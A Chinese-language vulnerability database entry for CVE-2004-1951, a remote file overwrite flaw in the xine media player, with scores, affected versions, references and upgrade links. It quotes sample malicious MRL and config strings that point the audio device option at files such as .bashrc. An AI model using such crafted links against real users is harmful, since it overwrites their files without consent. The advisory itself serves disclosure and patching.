CVE-2004-1951
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:42:47
NMCOE    

[原文]xine 1.x alpha, 1.x beta, and 1.0rc through 1.0rc3a, and xine-ui 0.9.21 to 0.9.23 allows remote attackers to overwrite arbitrary files via the (1) audio.sun_audio_device or (2) dxr3.devicename options in an MRL link.


[CNNVD]Xine和Xine-Lib多个远程文件覆盖漏洞(CNNVD-200412-737)

        
        Xine是Linux系统下播放VCD/DVD的程序。
        Xine-lib媒体播放器在打开恶意MRL时存在问题,远程攻击者可以利用这个漏洞以应用程序进程覆盖任意内容到系统任意文件中。
        MRLs (media resource locator)是xine-lib库使用的URI用于描述要播放的内容位置,MRLS也提供多个功能提供xine配置选项,这些选项在播放之前被使用,但是部分xine配置指定文件选项在重放过程中会被写入内容,如"audio.sun_audio_device"指定SUN机器上的音频设备,音频流的解码PCM样例会写入到这个文件。通过用户打开类似如下MRL:
        " http://myserver/mybashrc#audio.sun_audio_device:.bashrc "
        更改"audio.sun_audio_device"选项值并播放特殊构建音频流,攻击者可覆盖系统文件,导致产生拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:xine:xine-lib:1_rc3c
cpe:/a:xine:xine:1_rc3b
cpe:/a:xine:xine:1_rc0a
cpe:/a:xine:xine:1_beta6
cpe:/a:xine:xine-ui:0.9.22
cpe:/a:xine:xine:1_beta12
cpe:/a:xine:xine:1_rc3a
cpe:/a:xine:xine-lib:1_rc3a
cpe:/a:xine:xine:0.9.13
cpe:/a:xine:xine:1_rc3
cpe:/a:xine:xine:1_beta2
cpe:/a:xine:xine:1_beta9
cpe:/a:xine:xine:1_beta8
cpe:/a:xine:xine:1_rc2
cpe:/a:xine:xine-ui:0.9.23
cpe:/a:xine:xine:1_beta11
cpe:/a:xine:xine-lib:1_rc2
cpe:/a:xine:xine:1_beta3
cpe:/a:xine:xine:1_beta7
cpe:/a:xine:xine:1_rc1
cpe:/a:xine:xine:1_beta5
cpe:/a:xine:xine:1_beta4
cpe:/a:xine:xine:0.9.8
cpe:/a:xine:xine-ui:0.9.21
cpe:/a:xine:xine:1_beta1
cpe:/a:xine:xine:1_beta10
cpe:/a:xine:xine-lib:1_rc3b

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1951
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1951
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-737
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/10193
(PATCH)  BID  10193
http://security.gentoo.org/glsa/glsa-200404-20.xml
(PATCH)  GENTOO  GLSA-200404-20
http://xforce.iss.net/xforce/xfdb/15939
(UNKNOWN)  XF  xine-mrl-file-overwrite(15939)
http://www.xinehq.de/index.php/security/XSA-2004-2
(VENDOR_ADVISORY)  CONFIRM  http://www.xinehq.de/index.php/security/XSA-2004-2
http://www.xinehq.de/index.php/security/XSA-2004-1
(VENDOR_ADVISORY)  CONFIRM  http://www.xinehq.de/index.php/security/XSA-2004-1
http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.372791
(UNKNOWN)  SLACKWARE  SSA:2004-111
http://secunia.com/advisories/11433
(UNKNOWN)  SECUNIA  11433
http://www.osvdb.org/5739
(UNKNOWN)  OSVDB  5739
http://www.osvdb.org/5594
(UNKNOWN)  OSVDB  5594

- 漏洞信息

Xine和Xine-Lib多个远程文件覆盖漏洞
中危 设计错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Xine是Linux系统下播放VCD/DVD的程序。
        Xine-lib媒体播放器在打开恶意MRL时存在问题,远程攻击者可以利用这个漏洞以应用程序进程覆盖任意内容到系统任意文件中。
        MRLs (media resource locator)是xine-lib库使用的URI用于描述要播放的内容位置,MRLS也提供多个功能提供xine配置选项,这些选项在播放之前被使用,但是部分xine配置指定文件选项在重放过程中会被写入内容,如"audio.sun_audio_device"指定SUN机器上的音频设备,音频流的解码PCM样例会写入到这个文件。通过用户打开类似如下MRL:
        " http://myserver/mybashrc#audio.sun_audio_device:.bashrc "
        更改"audio.sun_audio_device"选项值并播放特殊构建音频流,攻击者可覆盖系统文件,导致产生拒绝服务。
        

- 公告与补丁

        厂商补丁:
        Slackware
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Slackware Upgrade xine-lib-1rc3c-i686-2.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-lib-1rc3c-i686-2.tgz
        Slackware Upgrade xine-ui-0.99.1-i686-1.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/xine-ui-0.99.1-i686-1.tgz
        Slackware Upgrade xine-ui-0.99.1-i686-1.tgz
        ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/xine-ui-0.99.1-i686-1.tgz

- 漏洞信息 (24038)

Xine 0.9.x And Xine-Lib 1 Multiple Remote File Overwrite Vulnerabilities (EDBID:24038)
linux remote
2004-04-22 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/10193/info

It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.

It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured however that similar configuration parameters exists that affect other systems.

The configuration syntax:

"cfg:/audio.sun_audio_device:targetFile" 

If followed by the entry:

"http://www.example.com/attackerSpecifiedFile"

Will cause the attacker specified file to be written to the target file.		

- 漏洞信息

5594
xine-lib Playlists MRL Arbitrary File Modification
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown Vendor Verified

- 漏洞描述

xine-lib contains a flaw that may allow a remote attacker to overwrite arbitrary files. The problem is that playlists can alter options in the configuration file. If an attacker creates a specially crafted MRL link, they could overwrite arbitrary files on the system, if a person clicks on the link and plays the malicious audio stream.

- 时间线

2004-04-22 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1-rc3b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站